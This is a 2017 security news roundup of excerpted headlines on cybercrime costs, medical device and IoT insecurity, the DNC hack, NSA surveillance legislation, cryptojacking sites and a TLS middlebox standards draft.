IT Security News Blast 11-09-2017

Daily IT News: Why firewalls don't work

Fast-growing cyber crime threatens financial sector: Europol
Online criminals have become so sophisticated that gangs have created “conglomerations” with company structures that specialize in different criminal activities to carry out the attacks, Rob Wainwright, who leads the EU law enforcement agency, said. “What really concerns me is the sophistication of the capability, which is becoming good enough to really threaten parts of our critical infrastructure, certainly in the financial, banking sector,” he told Reuters.


Poll: Americans more worried about cyber crimes than other crimes
The survey found 67 percent of adults worry at least occasionally about computer hackers stealing their personal or financial information and 66 percent are concerned about being a victim of identity theft. The gap between fear of cyber crimes and the next most pressing concern — having your car stolen or broken into — was 28 percentage points. The question about hackers stealing information, which took the top spot, was added this year.


Cyber experts say threats to satellites are legion
Lisa Donnan, managing director of Option3Ventures, a venture capital firm focused on information security and analytics companies, said conversations with chief security officers (CSOs) have shifted from defense to damage control given the magnitude of cyber attacks. “When the average breach has been there for 221 days — on average — the game’s over,” she said. “When you speak to seasoned CSOs, their mindset is much more in resiliency and recovery, because they’ve lost the war.”


Why walls don’t work – the CISO revolution
When speaking with CISOs, the top four motivators we identified for increased investment in detection were cited as growth of mobile (41 per cent) and cloud service usage (41 per cent), the risk of a data breach (40 per cent), and the introduction of connected devices and IoT (37 per cent). As a result, nearly a quarter (23 per cent) of large organisations plan to implement detection technology in the near future.


Hacking medical devices is the next big security concern
The problem is widespread, it seems. Earlier this year, security firm Trend Micro conducted a study using Shodan, a search engine that indexes internet-connected devices, and found over 100,000 records relating to medical equipment and hospital computers worldwide that are openly exposed and potentially vulnerable to attack. […] Hackers are still one step behind on launching the kinds of sophisticated attack that would be needed to threaten patient health and hold hospitals to ransom, she says. But, she adds, “If had to go into hospital, I’d still be very concerned.”


Tactical cybersecurity: Military war-gaming comes to healthcare
“Healthcare organizations should create realistic scenarios using the typical threat actors seen in this sector,” she advised. “By discussing the issues on a generic healthcare network using common defense tools in the industry, the participants can work out the challenges they are seeing and discuss what is working or not, without the fear of releasing sensitive information.”


Cost of cyber crime rises rapidly as attacks increase
Good detection matters: the faster a breach can be identified and contained, the lower the cost. Having an incident response team, participating in threat sharing with other companies and using security analytics can help lower the cost of data breach, according to Ponemon. The cost of a data breach increases if it involves a third party, if the company has extensive migration to the cloud and extensive use of mobile platforms, according to the report.


IoT is Insecure, Get Over It! Say Researchers
“We write code and we are not perfect. The problem is, great security is expensive. You can’t just keep looking for vulnerabilities. You need to ship product and accept the fact you can’t solve security,” said Miller, who along with Valasek are principal autonomous vehicle security architects at GM’s Cruse Automation. The comments were made during a keynote at the Black Duck Software’s Flight 2017 conference.


NATO to Boost Command Sites, Cyber Policy With Eye on Russia
At a meeting on Wednesday in Brussels, the ministers also decided to integrate cyber into all NATO operations. The step puts this area on par with the alliance’s traditional domains of air, land and sea. It’s consistent with a 2014 decision by NATO to broaden the scope of its collective-defense commitment to cover cyber attacks. […] The policy revamp highlights two fronts beyond terrorism on which western defense planners are active: the re-emergence of conventional military threats and the risk of hybrid warfare including cyber attacks. In both cases, Russia is on NATO’s radar screen.


He Solved The DNC Hack. Now He’s Telling His Story For The First Time.
Johnston told them that their computer systems had been fully compromised — not just by one attack, but by two. Malware from the first attack had been festering in the DNC’s system for a whole year. The second infiltration was only a couple of months old. Both sets of malware were associated with Russian intelligence. Most disturbing: The hackers had been gathering copies of all emails and sending them out to someone, somewhere. Every single email that every DNC staffer typed had been spied on. Every word, every joke, every syllable.


How To Profit From The $6 Trillion A Year Cyber Crime Threat
Cybercrime attacks are expected to cost us $6 trillion a year by 2021. In a single year, cyber terrorism could cost us three times more than the entire U.S. housing and real estate industry is currently worth. The Chairman of IBM calls it the “greatest threat to every profession, every industry, every company in the world”. Cisco cites a report saying it will be more profitable than the global trade of all major illegal drugs combined. ATT calls it the greatest transfer of economic wealth in history. The response? A desperate scramble to ramp up spending to protect their businesses, and another massive opportunity for investors.


Where hackers haven’t directly influenced polls, they’ve undermined our faith in democracy
The problem with digital systems is the overarching fear that everything could be blown up in one act of hacker spite. This is compounded by the fact that we don’t know what we don’t know. A further issue with the DREs in Virginia and elsewhere is that they produce no paper trail. They have no vote-auditing capability. We are assured that they have never been hacked but if they were, how would we tell? The real enemy in this is official complacency.


U.S. House panel advances bill aimed at limiting NSA spying program
The House Judiciary Committee voted 27-8 to approve the bill, which would partially restrict the U.S. government’s ability to review American data collected under the foreign intelligence program by requiring a warrant in some cases. Lawmakers in both parties were sharply divided over whether the compromise proposal to amend what is known as Section 702 of the Foreign Intelligence Surveillance Act would enshrine sufficient privacy protections or possibly grant broader legal protections for the NSA’s surveillance regime.


World’s First Blockchain-Based Privacy App Starts Pre-Token Sale
All files and communications are encrypted in the senders’ browser before they are sent to the servers and stored in a decentralized storage area. Decryption of data is only possible in the browser of the intended recipients. All communications and data are encrypted on all devices. FortKnoxster users can communicate privately and safely, be it through inbox, chat, phone or video calls, file-storage etc. – eliminating the risk of hacks, cyber-threats and centralized government surveillance.


Digitization Spurs Port Security Spending
Frost & Sullivan’s report focuses on the land-side security of ports including surveillance, perimeter security, command and control, cybersecurity, screening and detection. Digitization of port operations, both for efficiency and capacity expansion, and new infrastructure will be drivers of such security spending, the report found. Developing innovative cyber-resilient technologies that monitor constantly evolving cyber threats was one of four “strategic imperatives” for industry.


Experts Raise Concerns Over Government Mobile Data Grab
Security experts have raised question marks over possible plans to use mobile phone data to help complete the UK national census after 2021. It was revealed this week that the Office of National Statistics (ONS) has been tracking the anonymized movements of thousands of adults in London to study commuter patterns. It’s part of the Administrative Data Census Project, an ONS initiative designed to work out whether the government can meet its stated ambition that “censuses after 2021 will be conducted using other sources of data.”


Women in Cybersecurity: Things are changing… slowly
Overall, while women do represent a minority of those attending, the trends are positive. SINET events have seen conference attendance by women go from 13 percent in 2007 to nearly 20 percent this year. A spot-check of numbers from some of the events held during the 10-year period indicated the increase was a gradual curve. This wasn’t a scientific survey by any means, but the numbers do support the empirical observation things are changing in a positive direction, albeit slowly.


Cryptojacking craze that drains your CPU now done by 2,500 sites
Willem de Groot, an independent security researcher who reported the findings Tuesday, told Ars that he believes all of the 2,496 sites he tracked are running out-of-date software with known security vulnerabilities that have been exploited to give attackers control. Attackers, he said, then used their access to add code that surreptitiously harnesses the CPUs and electricity of visitors to generate the digital currency known as Monero. About 80 percent of those sites, he added, also contain other types of malware that can steal visitors’ payment card details.


Malwarebytes is tracking missed detections in traditional antivirus
Tracking real-world scans on systems over the first six months of 2017, Malwarebytes says that typical desktop antivirus solutions aren’t cutting it. The company examined detection data from nearly 10 million endpoints, and discovered some of the most notable names in the anti-virus industry – even those who rank high in lab testing – are missing basic threats completely.


SSL spy boxes on your network getting you down? But wait, here’s an IETF draft to fix that
The working draft from three Cisco employees notes that so-called middleboxes – which intercept and decrypt connections – are often deployed to scrutinize and improve network security, but can end up breaking application services by terminating TLS connections. Middleboxes can also be used by organizations and ISPs to monitor employees and citizens. As such, the proposed new standard would lift the TLS handshake further up the OSI stack to the application layer by transporting TLS records in HTTP message bodies. They’re calling it “Application Layer TLS” or ATLS (TLS is the successor to SSL).




Critical Informatics and the Critical Informatics logo are the trademarks of Critical Informatics, Inc. All other brand names, trademarks, service marks and copyrights are the property of their respective owners.  © 2017 Critical Informatics, Inc. All rights reserved.